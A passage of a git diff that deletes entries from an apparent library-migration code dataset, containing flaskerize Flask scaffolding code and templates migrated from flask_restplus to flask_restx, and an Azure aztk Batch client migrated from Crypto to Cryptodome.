filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new app") - - -def blueprint(args): - """ - Static site blueprint - """ - - print("Generating a blueprint from static site") - - # The routing for `send_from_directory` comes directly from https://stackoverflow.com/questions/44209978/serving-a-create-react-app-with-flask # noqa - CONTENTS = f"""{HEADER} - -import os -from flask import Blueprint, send_from_directory - -site = Blueprint('site', __name__, static_folder='{args.source}') - -# Serve static site -@site.route('/') -def index(): - return send_from_directory(site.static_folder, 'index.html') - -""" - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new blueprint") - - -def wsgi(args): - from flaskerize.utils import split_file_factory - - filename, func = split_file_factory(args.source) - filename = filename.replace(".py", "") - - CONTENTS = f"""{HEADER} - -from {filename} import {func} -app = {func}() - """ - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new wsgi") - - -def namespace(args): - """ - Generate a new Flask-RESTplus API Namespace - """ - - CONTENTS = f"""from flask import request, jsonify -from flask_restx import Namespace, Resource -from flask_accepts import accepts, responds -import marshmallow as ma - -api = Namespace('{args.output_name}', description='All things {args.output_name}') - - -class {args.output_name.title()}: - '''A super awesome {args.output_name}''' - - def __init__(self, id: int, a_float: float = 42.0, description: str = ''): - self.id = id - self.a_float = a_float - self.description = description - - -class {args.output_name.title()}Schema(ma.Schema): - id = ma.fields.Integer() - a_float = ma.fields.Float() - description = ma.fields.String(256) - - @ma.post_load - def make(self, kwargs): - return {args.output_name.title()}(**kwargs) - - -@api.route('/') -class {args.output_name.title()}Resource(Resource): - @accepts(schema={args.output_name.title()}Schema, api=api) - @responds(schema={args.output_name.title()}Schema) - def post(self): - return request.parsed_obj - - @accepts(dict(name='id', type=int, help='ID of the {args.output_name.title()}'), api=api) - @responds(schema={args.output_name.title()}Schema) - def get(self): - return {args.output_name.title()}(id=request.parsed_args['id']) - - @accepts(schema={args.output_name.title()}Schema, api=api) - @responds(schema={args.output_name.title()}Schema) - def update(self, id, data): - pass - - @accepts(dict(name='id', type=int, help='ID of the {args.output_name.title()}'), api=api) - def delete(self, id): - pass - -""" - print(args) - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - - if not args.without_test: - namespace_test(args) - - -def namespace_test(args): - """ - Generate a new Flask-RESTplus API Namespace - """ - - CONTENTS = f"""import pytest - -from app.test.fixtures import app, client -from .{args.output_name} import {args.output_name.title()}, {args.output_name.title()}Schema - - -@pytest.fixture -def schema(): - return {args.output_name.title()}Schema() - - -def test_schema_valid(schema): # noqa - assert schema - - -def test_post(app, client, schema): # noqa - with client: - obj = {args.output_name.title()}(id=42) - resp = client.post('{args.output_name}/', json=schema.dump(obj).data) - rv = schema.load(resp.json).data - assert obj.id == rv.id - - -def test_get(app, client, schema): # noqa - with client: - resp = client.get('{args.output_name}/?id=42') - rv = schema.load(resp.json).data - assert rv - assert rv.id == 42 - -""" - print(args) - _generate( - CONTENTS, - output_name=args.output_name - and args.output_name.replace(".py", "") + "_test.py", - filename=args.output_file and args.output_file.replace(".py", "") + "_test.py", - dry_run=args.dry_run, - ) - - -def dockerfile(args): - import os - - CONTENTS = f"""FROM python:3.7 as base - -FROM base as builder -RUN mkdir /install -WORKDIR /install -RUN pip install --install-option="--prefix=/install" gunicorn -RUN pip install --install-option="--prefix=/install" flask - -FROM base -COPY --from=builder /install /usr/local -COPY . /app -WORKDIR /app - -EXPOSE 8080 -ENTRYPOINT ["gunicorn", "--bind", "0.0.0.0:8080", "--access-logfile", "-", "--error-logfile", "-", "{args.source}"] - -""" - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new Dockerfile") - print( - "Next, run `docker build -t my_app_image .` to build the docker image and " - "then use `docker run my_app_image -p 127.0.0.1:80:8080` to launch" - ) - - -# Mapping of keywords to generation functions -a: Dict[str, Callable] = { - "hello-world": hello_world, - "hw": hello_world, - "dockerfile": dockerfile, - "wsgi": wsgi, - "app_from_dir": app_from_dir, - "blueprint": blueprint, - "bp": blueprint, - "namespace": namespace, - "ns": namespace, -} diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.diff b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.diff deleted file mode 100644 index 0aa8163..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/flaskerize/schematics/entity/files/{{ name }}.template/controller.py.template b/flaskerize/schematics/entity/files/{{ name }}.template/controller.py.template - index ab2ea26e8a6180adc43c43e24f5ecb3ad3708e89..59d8319355bf95f26949fe13ac3d6be5b5282fb6 100644 - --- a/flaskerize/schematics/entity/files/{{ name }}.template/controller.py.template - +++ b/flaskerize/schematics/entity/files/{{ name }}.template/controller.py.template -@@ -1,6 +1,6 @@ --from flask_restplus import Resource -+from flask_restx import Resource - from flask import request --from flask_restplus import Namespace -+from flask_restx import Namespace - from flask_accepts import accepts, responds - from flask.wrappers import Response - from typing import List diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.source.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.source.py deleted file mode 100644 index 324fb5a..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.source.py +++ /dev/null @@ -1,57 +0,0 @@ -from flask_restplus import Resource -from flask import request -from flask_restplus import Namespace -from flask_accepts import accepts, responds -from flask.wrappers import Response -from typing import List - -from .schema import {{ capitalize(name) }}Schema -from .model import {{ capitalize(name) }} -from .service import {{ capitalize(name) }}Service - -api = Namespace("{{ capitalize(name) }}", description="{{ capitalize(name) }} information") - - -@api.route("/") -class {{ capitalize(name) }}Resource(Resource): - """{{ capitalize(name) }}s""" - - @responds(schema={{ capitalize(name) }}Schema, many=True) - def get(self) -> List[{{ capitalize(name) }}]: - """Get all {{ capitalize(name) }}s""" - - return {{ capitalize(name) }}Service.get_all() - - @accepts(schema={{ capitalize(name) }}Schema, api=api) - @responds(schema={{ capitalize(name) }}Schema) - def post(self): - """Create a Single {{ capitalize(name) }}""" - - return {{ capitalize(name) }}Service.create(request.parsed_obj) - - -@api.route("/") -@api.param("{{ lower(name) }}Id", "{{ capitalize(name) }} database ID") -class {{ capitalize(name) }}IdResource(Resource): - @responds(schema={{ capitalize(name) }}Schema) - def get(self, {{ lower(name) }}Id: int) -> {{ capitalize(name) }}: - """Get Single {{ capitalize(name) }}""" - - return {{ capitalize(name) }}Service.get_by_id({{ lower(name) }}Id) - - def delete(self, {{ lower(name) }}Id: int) -> Response: - """Delete Single {{ capitalize(name) }}""" - - from flask import jsonify - - id = {{ capitalize(name) }}Service.delete_by_id({{ lower(name) }}Id) - return jsonify(dict(status="Success", id=id)) - - @accepts(schema={{ capitalize(name) }}Schema, api=api) - @responds(schema={{ capitalize(name) }}Schema) - def put(self, {{ lower(name) }}Id: int) -> {{ capitalize(name) }}: - """Update Single {{ capitalize(name) }}""" - - changes = request.parsed_obj - {{ lower(name) }} = {{ capitalize(name) }}Service.get_by_id({{ lower(name) }}Id) - return {{ capitalize(name) }}Service.update({{ lower(name) }}, changes) diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.target.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.target.py deleted file mode 100644 index 47875ad..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.target.py +++ /dev/null @@ -1,57 +0,0 @@ -from flask_restx import Resource -from flask import request -from flask_restx import Namespace -from flask_accepts import accepts, responds -from flask.wrappers import Response -from typing import List - -from .schema import {{ capitalize(name) }}Schema -from .model import {{ capitalize(name) }} -from .service import {{ capitalize(name) }}Service - -api = Namespace("{{ capitalize(name) }}", description="{{ capitalize(name) }} information") - - -@api.route("/") -class {{ capitalize(name) }}Resource(Resource): - """{{ capitalize(name) }}s""" - - @responds(schema={{ capitalize(name) }}Schema, many=True) - def get(self) -> List[{{ capitalize(name) }}]: - """Get all {{ capitalize(name) }}s""" - - return {{ capitalize(name) }}Service.get_all() - - @accepts(schema={{ capitalize(name) }}Schema, api=api) - @responds(schema={{ capitalize(name) }}Schema) - def post(self): - """Create a Single {{ capitalize(name) }}""" - - return {{ capitalize(name) }}Service.create(request.parsed_obj) - - -@api.route("/") -@api.param("{{ lower(name) }}Id", "{{ capitalize(name) }} database ID") -class {{ capitalize(name) }}IdResource(Resource): - @responds(schema={{ capitalize(name) }}Schema) - def get(self, {{ lower(name) }}Id: int) -> {{ capitalize(name) }}: - """Get Single {{ capitalize(name) }}""" - - return {{ capitalize(name) }}Service.get_by_id({{ lower(name) }}Id) - - def delete(self, {{ lower(name) }}Id: int) -> Response: - """Delete Single {{ capitalize(name) }}""" - - from flask import jsonify - - id = {{ capitalize(name) }}Service.delete_by_id({{ lower(name) }}Id) - return jsonify(dict(status="Success", id=id)) - - @accepts(schema={{ capitalize(name) }}Schema, api=api) - @responds(schema={{ capitalize(name) }}Schema) - def put(self, {{ lower(name) }}Id: int) -> {{ capitalize(name) }}: - """Update Single {{ capitalize(name) }}""" - - changes = request.parsed_obj - {{ lower(name) }} = {{ capitalize(name) }}Service.get_by_id({{ lower(name) }}Id) - return {{ capitalize(name) }}Service.update({{ lower(name) }}, changes) diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.diff b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.diff deleted file mode 100644 index f5fbdaa..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.diff +++ /dev/null @@ -1,12 +0,0 @@ -diff --git a/flaskerize/schematics/flask-api/files/{{ name }}.template/app/__init__.py b/flaskerize/schematics/flask-api/files/{{ name }}.template/app/__init__.py - index ab2ea26e8a6180adc43c43e24f5ecb3ad3708e89..59d8319355bf95f26949fe13ac3d6be5b5282fb6 100644 - --- a/flaskerize/schematics/flask-api/files/{{ name }}.template/app/__init__.py - +++ b/flaskerize/schematics/flask-api/files/{{ name }}.template/app/__init__.py -@@ -1,6 +1,6 @@ - from flask import Flask, jsonify - from flask_sqlalchemy import SQLAlchemy --from flask_restplus import Api -+from flask_restx import Api - - db = SQLAlchemy() - diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.source.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.source.py deleted file mode 100644 index 64fbf94..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.source.py +++ /dev/null @@ -1,23 +0,0 @@ -from flask import Flask, jsonify -from flask_sqlalchemy import SQLAlchemy -from flask_restplus import Api - -db = SQLAlchemy() - - -def create_app(env=None): - from app.config import config_by_name - from app.routes import register_routes - - app = Flask(__name__) - app.config.from_object(config_by_name[env or "test"]) - api = Api(app, title="Flaskerific API", version="0.1.0") - - register_routes(api, app) - db.init_app(app) - - @app.route("/health") - def health(): - return jsonify("healthy") - - return app diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.target.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.target.py deleted file mode 100644 index 0e6f678..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.target.py +++ /dev/null @@ -1,23 +0,0 @@ -from flask import Flask, jsonify -from flask_sqlalchemy import SQLAlchemy -from flask_restx import Api - -db = SQLAlchemy() - - -def create_app(env=None): - from app.config import config_by_name - from app.routes import register_routes - - app = Flask(__name__) - app.config.from_object(config_by_name[env or "test"]) - api = Api(app, title="Flaskerific API", version="0.1.0") - - register_routes(api, app) - db.init_app(app) - - @app.route("/health") - def health(): - return jsonify("healthy") - - return app diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.diff b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.diff deleted file mode 100644 index 16eac20..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.diff +++ /dev/null @@ -1,12 +0,0 @@ -diff --git a/flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/controller.py b/flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/controller.py - index ab2ea26e8a6180adc43c43e24f5ecb3ad3708e89..59d8319355bf95f26949fe13ac3d6be5b5282fb6 100644 - --- a/flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/controller.py - +++ b/flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/controller.py -@@ -1,6 +1,6 @@ - from flask import request - from flask_accepts import accepts, responds --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - from flask.wrappers import Response - from typing import List - diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.source.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.source.py deleted file mode 100644 index 364f0ee..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.source.py +++ /dev/null @@ -1,56 +0,0 @@ -from flask import request -from flask_accepts import accepts, responds -from flask_restplus import Namespace, Resource -from flask.wrappers import Response -from typing import List - -from .schema import WidgetSchema -from .service import WidgetService -from .model import Widget -from .interface import WidgetInterface - -api = Namespace("Widget", description="Single namespace, single entity") # noqa - - -@api.route("/") -class WidgetResource(Resource): - """Widgets""" - - @responds(schema=WidgetSchema, many=True) - def get(self) -> List[Widget]: - """Get all Widgets""" - - return WidgetService.get_all() - - @accepts(schema=WidgetSchema, api=api) - @responds(schema=WidgetSchema) - def post(self) -> Widget: - """Create a Single Widget""" - - return WidgetService.create(request.parsed_obj) - - -@api.route("/") -@api.param("widgetId", "Widget database ID") -class WidgetIdResource(Resource): - @responds(schema=WidgetSchema) - def get(self, widgetId: int) -> Widget: - """Get Single Widget""" - - return WidgetService.get_by_id(widgetId) - - def delete(self, widgetId: int) -> Response: - """Delete Single Widget""" - from flask import jsonify - - id = WidgetService.delete_by_id(widgetId) - return jsonify(dict(status="Success", id=id)) - - @accepts(schema=WidgetSchema, api=api) - @responds(schema=WidgetSchema) - def put(self, widgetId: int) -> Widget: - """Update Single Widget""" - - changes: WidgetInterface = request.parsed_obj - Widget = WidgetService.get_by_id(widgetId) - return WidgetService.update(Widget, changes) diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.target.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.target.py deleted file mode 100644 index 5d0478d..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.target.py +++ /dev/null @@ -1,56 +0,0 @@ -from flask import request -from flask_accepts import accepts, responds -from flask_restx import Namespace, Resource -from flask.wrappers import Response -from typing import List - -from .schema import WidgetSchema -from .service import WidgetService -from .model import Widget -from .interface import WidgetInterface - -api = Namespace("Widget", description="Single namespace, single entity") # noqa - - -@api.route("/") -class WidgetResource(Resource): - """Widgets""" - - @responds(schema=WidgetSchema, many=True) - def get(self) -> List[Widget]: - """Get all Widgets""" - - return WidgetService.get_all() - - @accepts(schema=WidgetSchema, api=api) - @responds(schema=WidgetSchema) - def post(self) -> Widget: - """Create a Single Widget""" - - return WidgetService.create(request.parsed_obj) - - -@api.route("/") -@api.param("widgetId", "Widget database ID") -class WidgetIdResource(Resource): - @responds(schema=WidgetSchema) - def get(self, widgetId: int) -> Widget: - """Get Single Widget""" - - return WidgetService.get_by_id(widgetId) - - def delete(self, widgetId: int) -> Response: - """Delete Single Widget""" - from flask import jsonify - - id = WidgetService.delete_by_id(widgetId) - return jsonify(dict(status="Success", id=id)) - - @accepts(schema=WidgetSchema, api=api) - @responds(schema=WidgetSchema) - def put(self, widgetId: int) -> Widget: - """Update Single Widget""" - - changes: WidgetInterface = request.parsed_obj - Widget = WidgetService.get_by_id(widgetId) - return WidgetService.update(Widget, changes) diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.diff b/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.diff deleted file mode 100644 index 1eb6007..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/aztk/client.py b/aztk/client.py - index 3d16cf39545e39ee52fa350c7f251c2cc8679228..19dde429a702c29bdcf86a69805053ecfd02edee 100644 - --- a/aztk/client.py - +++ b/aztk/client.py -@@ -12,7 +12,7 @@ import aztk.utils.ssh as ssh_lib - import aztk.models as models - import azure.batch.models as batch_models - from azure.batch.models import batch_error --from Crypto.PublicKey import RSA -+from Cryptodome.PublicKey import RSA - from aztk.internal import cluster_data - - class Client: diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.source.py b/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.source.py deleted file mode 100644 index 84d2138..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.source.py +++ /dev/null @@ -1,401 +0,0 @@ -import asyncio -import concurrent.futures -from datetime import datetime, timedelta, timezone - -import azure.batch.models as batch_models -import azure.batch.models.batch_error as batch_error -import aztk.utils.azure_api as azure_api -import aztk.utils.constants as constants -import aztk.utils.get_ssh_key as get_ssh_key -import aztk.utils.helpers as helpers -import aztk.utils.ssh as ssh_lib -import aztk.models as models -import azure.batch.models as batch_models -from azure.batch.models import batch_error -from Crypto.PublicKey import RSA -from aztk.internal import cluster_data - -class Client: - def __init__(self, secrets_config: models.SecretsConfiguration): - self.secrets_config = secrets_config - - azure_api.validate_secrets(secrets_config) - self.batch_client = azure_api.make_batch_client(secrets_config) - self.blob_client = azure_api.make_blob_client(secrets_config) - - def get_cluster_config(self, cluster_id: str) -> models.ClusterConfiguration: - return self._get_cluster_data(cluster_id).read_cluster_config() - - def _get_cluster_data(self, cluster_id: str) -> cluster_data.ClusterData: - """ - Returns ClusterData object to manage data related to the given cluster id - """ - return cluster_data.ClusterData(self.blob_client, cluster_id) - - ''' - General Batch Operations - ''' - - def __delete_pool_and_job(self, pool_id: str, keep_logs: bool = False): - """ - Delete a pool and it's associated job - :param cluster_id: the pool to add the user to - :return bool: deleted the pool if exists and job if exists - """ - # job id is equal to pool id - job_id = pool_id - job_exists = True - - try: - self.batch_client.job.get(job_id) - except batch_models.batch_error.BatchErrorException: - job_exists = False - - pool_exists = self.batch_client.pool.exists(pool_id) - - if job_exists: - self.batch_client.job.delete(job_id) - - if pool_exists: - self.batch_client.pool.delete(pool_id) - - if not keep_logs: - cluster_data = self._get_cluster_data(pool_id) - cluster_data.delete_container(pool_id) - - return job_exists or pool_exists - - def __create_pool_and_job(self, cluster_conf: models.ClusterConfiguration, software_metadata_key: str, start_task, VmImageModel): - """ - Create a pool and job - :param cluster_conf: the configuration object used to create the cluster - :type cluster_conf: aztk.models.ClusterConfiguration - :parm software_metadata_key: the id of the software being used on the cluster - :param start_task: the start task for the cluster - :param VmImageModel: the type of image to provision for the cluster - :param wait: wait until the cluster is ready - """ - self._get_cluster_data(cluster_conf.cluster_id).save_cluster_config(cluster_conf) - # reuse pool_id as job_id - pool_id = cluster_conf.cluster_id - job_id = cluster_conf.cluster_id - - # Get a verified node agent sku - sku_to_use, image_ref_to_use = \ - helpers.select_latest_verified_vm_image_with_node_agent_sku( - VmImageModel.publisher, VmImageModel.offer, VmImageModel.sku, self.batch_client) - - network_conf = None - if cluster_conf.subnet_id is not None: - network_conf = batch_models.NetworkConfiguration( - subnet_id=cluster_conf.subnet_id) - auto_scale_formula = "$TargetDedicatedNodes={0}; $TargetLowPriorityNodes={1}".format( - cluster_conf.vm_count, cluster_conf.vm_low_pri_count) - - # Confiure the pool - pool = batch_models.PoolAddParameter( - id=pool_id, - virtual_machine_configuration=batch_models.VirtualMachineConfiguration( - image_reference=image_ref_to_use, - node_agent_sku_id=sku_to_use), - vm_size=cluster_conf.vm_size, - enable_auto_scale=True, - auto_scale_formula=auto_scale_formula, - auto_scale_evaluation_interval=timedelta(minutes=5), - start_task=start_task, - enable_inter_node_communication=True if not cluster_conf.subnet_id else False, - max_tasks_per_node=4, - network_configuration=network_conf, - metadata=[ - batch_models.MetadataItem( - name=constants.AZTK_SOFTWARE_METADATA_KEY, value=software_metadata_key), - batch_models.MetadataItem( - name=constants.AZTK_MODE_METADATA_KEY, value=constants.AZTK_CLUSTER_MODE_METADATA) - ]) - - # Create the pool + create user for the pool - helpers.create_pool_if_not_exist(pool, self.batch_client) - - # Create job - job = batch_models.JobAddParameter( - id=job_id, - pool_info=batch_models.PoolInformation(pool_id=pool_id)) - - # Add job to batch - self.batch_client.job.add(job) - - return helpers.get_cluster(cluster_conf.cluster_id, self.batch_client) - - def __get_pool_details(self, cluster_id: str): - """ - Print the information for the given cluster - :param cluster_id: Id of the cluster - :return pool: CloudPool, nodes: ComputeNodePaged - """ - pool = self.batch_client.pool.get(cluster_id) - nodes = self.batch_client.compute_node.list(pool_id=cluster_id) - return pool, nodes - - def __list_clusters(self, software_metadata_key): - """ - List all the cluster on your account. - """ - pools = self.batch_client.pool.list() - software_metadata = ( - constants.AZTK_SOFTWARE_METADATA_KEY, software_metadata_key) - cluster_metadata = ( - constants.AZTK_MODE_METADATA_KEY, constants.AZTK_CLUSTER_MODE_METADATA) - - aztk_pools = [] - for pool in [pool for pool in pools if pool.metadata]: - pool_metadata = [(metadata.name, metadata.value) for metadata in pool.metadata] - if all([metadata in pool_metadata for metadata in [software_metadata, cluster_metadata]]): - aztk_pools.append(pool) - return aztk_pools - - def __create_user(self, pool_id: str, node_id: str, username: str, password: str = None, ssh_key: str = None) -> str: - """ - Create a pool user - :param pool: the pool to add the user to - :param node: the node to add the user to - :param username: username of the user to add - :param password: password of the user to add - :param ssh_key: ssh_key of the user to add - """ - # Create new ssh user for the master node - self.batch_client.compute_node.add_user( - pool_id, - node_id, - batch_models.ComputeNodeUser( - name=username, - is_admin=True, - password=password, - ssh_public_key=get_ssh_key.get_user_public_key( - ssh_key, self.secrets_config), - expiry_time=datetime.now(timezone.utc) + timedelta(days=365))) - - def __delete_user(self, pool_id: str, node_id: str, username: str) -> str: - """ - Create a pool user - :param pool: the pool to add the user to - :param node: the node to add the user to - :param username: username of the user to add - """ - # Delete a user on the given node - self.batch_client.compute_node.delete_user(pool_id, node_id, username) - - - def __get_remote_login_settings(self, pool_id: str, node_id: str): - """ - Get the remote_login_settings for node - :param pool_id - :param node_id - :returns aztk.models.RemoteLogin - """ - result = self.batch_client.compute_node.get_remote_login_settings( - pool_id, node_id) - return models.RemoteLogin(ip_address=result.remote_login_ip_address, port=str(result.remote_login_port)) - - def __create_user_on_node(self, username, pool_id, node_id, ssh_key): - try: - self.__create_user(pool_id=pool_id, node_id=node_id, username=username, ssh_key=ssh_key) - except batch_error.BatchErrorException as error: - try: - self.__delete_user(pool_id, node_id, username) - self.__create_user(pool_id=pool_id, node_id=node_id, username=username, ssh_key=ssh_key) - except batch_error.BatchErrorException as error: - print(error) - raise error - return ssh_key - - def __create_user_on_pool(self, username, pool_id, nodes): - ssh_key = RSA.generate(2048) - ssh_pub_key = ssh_key.publickey().exportKey('OpenSSH').decode('utf-8') - with concurrent.futures.ThreadPoolExecutor() as executor: - futures = {executor.submit(self.__create_user_on_node, - username, - pool_id, - node.id, - ssh_pub_key): node for node in nodes} - concurrent.futures.wait(futures) - return ssh_key - - def __delete_user_on_pool(self, username, pool_id, nodes): - with concurrent.futures.ThreadPoolExecutor() as exector: - futures = [exector.submit(self.__delete_user, pool_id, node.id, username) for node in nodes] - concurrent.futures.wait(futures) - - - def __cluster_run(self, cluster_id, command, internal, container_name=None, timeout=None): - pool, nodes = self.__get_pool_details(cluster_id) - nodes = [node for node in nodes] - if internal: - cluster_nodes = [(node, models.RemoteLogin(ip_address=node.ip_address, port="22")) for node in nodes] - else: - cluster_nodes = [(node, self.__get_remote_login_settings(pool.id, node.id)) for node in nodes] - try: - ssh_key = self.__create_user_on_pool('aztk', pool.id, nodes) - output = asyncio.get_event_loop().run_until_complete(ssh_lib.clus_exec_command(command, - 'aztk', - cluster_nodes, - ssh_key=ssh_key.exportKey().decode('utf-8'), - container_name=container_name, - timeout=timeout)) - return output - except OSError as exc: - raise exc - finally: - self.__delete_user_on_pool('aztk', pool.id, nodes) - - def __cluster_copy(self, cluster_id, source_path, destination_path, container_name=None, internal=False, get=False, timeout=None): - pool, nodes = self.__get_pool_details(cluster_id) - nodes = [node for node in nodes] - if internal: - cluster_nodes = [(node, models.RemoteLogin(ip_address=node.ip_address, port="22")) for node in nodes] - else: - cluster_nodes = [(node, self.__get_remote_login_settings(pool.id, node.id)) for node in nodes] - try: - ssh_key = self.__create_user_on_pool('aztk', pool.id, nodes) - output = asyncio.get_event_loop().run_until_complete( - ssh_lib.clus_copy(container_name=container_name, - username='aztk', - nodes=cluster_nodes, - source_path=source_path, - destination_path=destination_path, - ssh_key=ssh_key.exportKey().decode('utf-8'), - get=get, - timeout=timeout)) - return output - except (OSError, batch_error.BatchErrorException) as exc: - raise exc - finally: - self.__delete_user_on_pool('aztk', pool.id, nodes) - - def __submit_job(self, - job_configuration, - start_task, - job_manager_task, - autoscale_formula, - software_metadata_key: str, - vm_image_model, - application_metadata): - """ - Job Submission - :param job_configuration -> aztk_sdk.spark.models.JobConfiguration - :param start_task -> batch_models.StartTask - :param job_manager_task -> batch_models.TaskAddParameter - :param autoscale forumula -> str - :param software_metadata_key -> str - :param vm_image_model -> aztk_sdk.models.VmImage - :returns None - """ - self._get_cluster_data(job_configuration.id).save_cluster_config(job_configuration.to_cluster_config()) - - # get a verified node agent sku - sku_to_use, image_ref_to_use = \ - helpers.select_latest_verified_vm_image_with_node_agent_sku( - vm_image_model.publisher, vm_image_model.offer, vm_image_model.sku, self.batch_client) - - # set up subnet if necessary - network_conf = None - if job_configuration.subnet_id: - network_conf = batch_models.NetworkConfiguration( - subnet_id=job_configuration.subnet_id) - - # set up a schedule for a recurring job - auto_pool_specification = batch_models.AutoPoolSpecification( - pool_lifetime_option=batch_models.PoolLifetimeOption.job_schedule, - auto_pool_id_prefix=job_configuration.id, - keep_alive=False, - pool=batch_models.PoolSpecification( - display_name=job_configuration.id, - virtual_machine_configuration=batch_models.VirtualMachineConfiguration( - image_reference=image_ref_to_use, - node_agent_sku_id=sku_to_use), - vm_size=job_configuration.vm_size, - enable_auto_scale=True, - auto_scale_formula=autoscale_formula, - auto_scale_evaluation_interval=timedelta(minutes=5), - start_task=start_task, - enable_inter_node_communication=not job_configuration.mixed_mode(), - network_configuration=network_conf, - max_tasks_per_node=4, - metadata=[ - batch_models.MetadataItem( - name=constants.AZTK_SOFTWARE_METADATA_KEY, value=software_metadata_key), - batch_models.MetadataItem( - name=constants.AZTK_MODE_METADATA_KEY, value=constants.AZTK_JOB_MODE_METADATA) - ] - ) - ) - - # define job specification - job_spec = batch_models.JobSpecification( - pool_info=batch_models.PoolInformation(auto_pool_specification=auto_pool_specification), - display_name=job_configuration.id, - on_all_tasks_complete=batch_models.OnAllTasksComplete.terminate_job, - job_manager_task=job_manager_task, - metadata=[ - batch_models.MetadataItem( - name='applications', value=application_metadata) - ] - ) - - # define schedule - schedule = batch_models.Schedule( - do_not_run_until=None, - do_not_run_after=None, - start_window=None, - recurrence_interval=None - ) - - # create job schedule and add task - setup = batch_models.JobScheduleAddParameter( - id=job_configuration.id, - schedule=schedule, - job_specification=job_spec) - - self.batch_client.job_schedule.add(setup) - - return self.batch_client.job_schedule.get(job_schedule_id=job_configuration.id) - - - ''' - Define Public Interface - ''' - - def create_cluster(self, cluster_conf, wait: bool = False): - raise NotImplementedError() - - def create_clusters_in_parallel(self, cluster_confs): - raise NotImplementedError() - - def delete_cluster(self, cluster_id: str): - raise NotImplementedError() - - def get_cluster(self, cluster_id: str): - raise NotImplementedError() - - def list_clusters(self): - raise NotImplementedError() - - def wait_until_cluster_is_ready(self, cluster_id): - raise NotImplementedError() - - def create_user(self, cluster_id: str, username: str, password: str = None, ssh_key: str = None) -> str: - raise NotImplementedError() - - def get_remote_login_settings(self, cluster_id, node_id): - raise NotImplementedError() - - def cluster_run(self, cluster_id, command): - raise NotImplementedError() - - def cluster_copy(self, cluster_id, source_path, destination_path): - raise NotImplementedError() - - def cluster_download(self, cluster_id, source_path, destination_path): - raise NotImplementedError() - - def submit_job(self, job): - raise NotImplementedError() diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.target.py b/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.target.py deleted file mode 100644 index 